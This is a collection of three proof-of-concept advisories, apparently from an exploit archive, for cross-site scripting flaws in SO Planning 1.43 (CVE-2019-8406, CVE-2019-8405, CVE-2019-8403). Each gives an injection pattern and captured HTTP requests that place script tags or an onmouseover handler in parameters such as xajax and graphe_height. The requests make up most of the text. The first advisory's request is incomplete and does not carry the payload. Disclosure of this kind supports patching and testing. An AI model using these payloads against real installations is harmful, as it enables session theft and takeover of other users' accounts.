===========================================================================================
# Exploit Title: SO Planning 1.43 - 'PROJECT_COLORS_POSSIBLE' XSS Injection
# CVE: CVE-2019-8406
# Date: 17-02-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://www.soplanning.org/en/
# Software Link: https://sourceforge.net/projects/soplanning/
# Version: v1.43
# Category: Webapps
# Tested on: Wamp64, @Win
# Software description: SO Planning is a Simple Online Planning tool.
# Allows you to plan working periods for each person of your team,
# in a visual / printable result.
===========================================================================================
# POC - XSS
# Parameters : PROJECT_COLORS_POSSIBLE
# Attack Pattern : e'"()&%<acx><ScRiPt >alert(9871)</ScRiPt>
# POST Request : http://localhost/soplanning/www/process/options.php (the captured request below is the GET for the options page; the POST body carrying the parameter is not included)
===========================================================================================
GET /soplanning/www/options.php HTTP/1.1
Referer: http://localhost/soplanning/
Cookie: sloapplanning_=28973u450s43jhtt88s8e2molo; baseLigne=users; baseColonne=jours; dimensionCase=reduit; date_debut_affiche=09%2F02%2F2019; date_fin_affiche=08%2F05%2F2019; statut_projet=%5B%22abandon%22%2C%22archive%22%2C%22a_faire%22%2C%22en_cours%22%2C%22fait%22%2C%22a%22%2C%22%23%22%2C%22%23%22%2C%22p%22%2Cnull%2Cnull%2Cnull%2Cnull%2C%220%22%2C%221%22%2C%22f%22%2C%224%22%2Cnull%2Cnull%2C%22a%22%2C%22%23%22%2C%22%23%22%2C%22p%22%2Cnull%2Cnull%2Cnull%2Cnull%2C%220%22%2C%221%22%2C%22f%22%2C%224%22%2Cnull%2Cnull%2C%22e%22%2C%22%23%22%2C%22%23%22%2C%22p%22%2Cnull%2Cnull%2Cnull%2Cnull%2C%220%22%2C%221%22%2C%22f%22%2C%224%22%2Cnull%2Cnull%2C%22f%22%2C%22%23%22%2C%22%23%22%2C%22p%22%2Cnull%2Cnull%2Cnull%2Cnull%2C%220%22%2C%221%22%2C%22f%22%2C%224%22%2Cnull%2Cnull%2C%22a%22%2C%22%23%22%2C%22%23%22%2C%22p%22%2Cnull%2Cnull%2Cnull%2Cnull%2C%220%22%2C%221%22%2C%22f%22%2C%224%22%2Cnull%2Cnull%2C%22a%22%2C%22%23%22%2C%22%23%22%2C%22p%22%2Cnull%2Cnull%2Cnull%2Cnull%2C%220%22%2C%221%22%2C%22f%22%2C%224%22%2Cnull%2Cnull%5D; dateDebut=16/02/2019; dateFin=16/04/2019; xposJoursWin=0; xposJours=0; xposMois=0; yposMois=0; xposMoisWin=0; pdf_orientation=portrait; pdf_format=A0; date_debut_affiche_tache=e; date_fin_affiche_tache=e
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Host: localhost
###########################################################################################
===========================================================================================
# Exploit Title: SO Planning 1.43 - 'xajax' XSS Injection
# CVE: CVE-2019-8405
# Date: 17-02-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://www.soplanning.org/en/
# Software Link: https://sourceforge.net/projects/soplanning/
# Version: v1.43
# Category: Webapps
# Tested on: Wamp64, @Win
# Software description: SO Planning is a Simple Online Planning tool.
# Allows you to plan working periods for each person of your team,
# in a visual / printable result.
===========================================================================================
# POC - XSS
# Parameters : xajax
# Attack Pattern : submitFormProjet'"()&%<acx><ScRiPt >lWct(9209)</ScRiPt>
# POST Request : http://localhost/soplanning/www/process/xajax_server.php
===========================================================================================
POST /soplanning/www/process/xajax_server.php HTTP/1.1
Content-Length: 334
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost/soplanning/
Cookie: sloapplanning_=28973u450s43jhtt88s8e2molo; baseLigne=users; baseColonne=jours; dimensionCase=reduit; date_debut_affiche=09%2F02%2F2019; date_fin_affiche=08%2F05%2F2019; statut_projet=%5B%22abandon%22%2C%22archive%22%2C%22a_faire%22%2C%22en_cours%22%2C%22fait%22%2C%22a%22%2C%22%23%22%2C%22%23%22%2C%22p%22%2Cnull%2Cnull%2Cnull%2Cnull%2C%220%22%2C%221%22%2C%22f%22%2C%224%22%2Cnull%2Cnull%2C%22a%22%2C%22%23%22%2C%22%23%22%2C%22p%22%2Cnull%2Cnull%2Cnull%2Cnull%2C%220%22%2C%221%22%2C%22f%22%2C%224%22%2Cnull%2Cnull%2C%22e%22%2C%22%23%22%2C%22%23%22%2C%22p%22%2Cnull%2Cnull%2Cnull%2Cnull%2C%220%22%2C%221%22%2C%22f%22%2C%224%22%2Cnull%2Cnull%2C%22f%22%2C%22%23%22%2C%22%23%22%2C%22p%22%2Cnull%2Cnull%2Cnull%2Cnull%2C%220%22%2C%221%22%2C%22f%22%2C%224%22%2Cnull%2Cnull%2C%22a%22%2C%22%23%22%2C%22%23%22%2C%22p%22%2Cnull%2Cnull%2Cnull%2Cnull%2C%220%22%2C%221%22%2C%22f%22%2C%224%22%2Cnull%2Cnull%2C%22a%22%2C%22%23%22%2C%22%23%22%2C%22p%22%2Cnull%2Cnull%2Cnull%2Cnull%2C%220%22%2C%221%22%2C%22f%22%2C%224%22%2Cnull%2Cnull%5D; dateDebut=16/02/2019; dateFin=16/04/2019; xposJoursWin=0; xposJours=0; xposMois=0; yposMois=0; xposMoisWin=0; pdf_orientation=portrait; pdf_format=A0; date_debut_affiche_tache=e; date_fin_affiche_tache=e
Host: localhost
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
xajax=submitFormProjet'"()%26%25<acx><ScRiPt%20>lWct(9209)</ScRiPt>&xajaxargs[]=undefined&xajaxargs[]=undefined&xajaxargs[]=undefined&xajaxargs[]=undefined&xajaxargs[]=undefined&xajaxargs[]=undefined&xajaxargs[]=undefined&xajaxargs[]=undefined&xajaxargs[]=&xajaxargs[]=undefined&xajaxargs[]=undefined&xajaxargs[]=&xajaxr=1550350032415
###########################################################################################
===========================================================================================
# Exploit Title: SO Planning 1.43 - 'graphe_width' XSS Injection
# CVE: CVE-2019-8403
# Date: 17-02-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://www.soplanning.org/en/
# Software Link: https://sourceforge.net/projects/soplanning/
# Version: v1.43
# Category: Webapps
# Tested on: Wamp64, @Win
# Software description: SO Planning is a Simple Online Planning tool.
# Allows you to plan working periods for each person of your team,
# in a visual / printable result.
===========================================================================================
# POC - XSS
# Parameters : graphe_width, graphe_height, ordonnee_max, ordonnee_min (the request below injects into graphe_height only)
# Attack Pattern : 500"onmouseover=jfQ2(9564)"
# POST Request : http://localhost/soplanning/www/stats_users.php
===========================================================================================
POST /soplanning/www/stats_users.php HTTP/1.1
Content-Length: 245
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost/soplanning/
Cookie: sloapplanning_=28973u450s43jhtt88s8e2molo; baseLigne=users; baseColonne=jours; dimensionCase=reduit; date_debut_affiche=09%2F02%2F2019; date_fin_affiche=08%2F05%2F2019; statut_projet=%5B%22abandon%22%2C%22archive%22%2C%22a_faire%22%2C%22en_cours%22%2C%22fait%22%2C%22a%22%2C%22%23%22%2C%22%23%22%2C%22p%22%2Cnull%2Cnull%2Cnull%2Cnull%2C%220%22%2C%221%22%2C%22f%22%2C%224%22%2Cnull%2Cnull%2C%22a%22%2C%22%23%22%2C%22%23%22%2C%22p%22%2Cnull%2Cnull%2Cnull%2Cnull%2C%220%22%2C%221%22%2C%22f%22%2C%224%22%2Cnull%2Cnull%2C%22e%22%2C%22%23%22%2C%22%23%22%2C%22p%22%2Cnull%2Cnull%2Cnull%2Cnull%2C%220%22%2C%221%22%2C%22f%22%2C%224%22%2Cnull%2Cnull%2C%22f%22%2C%22%23%22%2C%22%23%22%2C%22p%22%2Cnull%2Cnull%2Cnull%2Cnull%2C%220%22%2C%221%22%2C%22f%22%2C%224%22%2Cnull%2Cnull%2C%22a%22%2C%22%23%22%2C%22%23%22%2C%22p%22%2Cnull%2Cnull%2Cnull%2Cnull%2C%220%22%2C%221%22%2C%22f%22%2C%224%22%2Cnull%2Cnull%2C%22a%22%2C%22%23%22%2C%22%23%22%2C%22p%22%2Cnull%2Cnull%2Cnull%2Cnull%2C%220%22%2C%221%22%2C%22f%22%2C%224%22%2Cnull%2Cnull%5D; dateDebut=16/02/2019; dateFin=16/04/2019; xposJoursWin=0; xposJours=0; xposMois=0; yposMois=0; xposMoisWin=0; pdf_orientation=portrait; pdf_format=A0; date_debut_affiche_tache=e; date_fin_affiche_tache=e
Host: localhost
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
abscisse_echelle=jour&abscisse_echelle_valeur=heures&date_debut=16/02/2019&date_fin=16/03/2019&graphe_height=500"onmouseover=jfQ2(9564)"&graphe_width=1100&grille=grille_h&ordonnee_max=1&ordonnee_min=1&projets=1&projet_id=test&users=1&user_id=ADM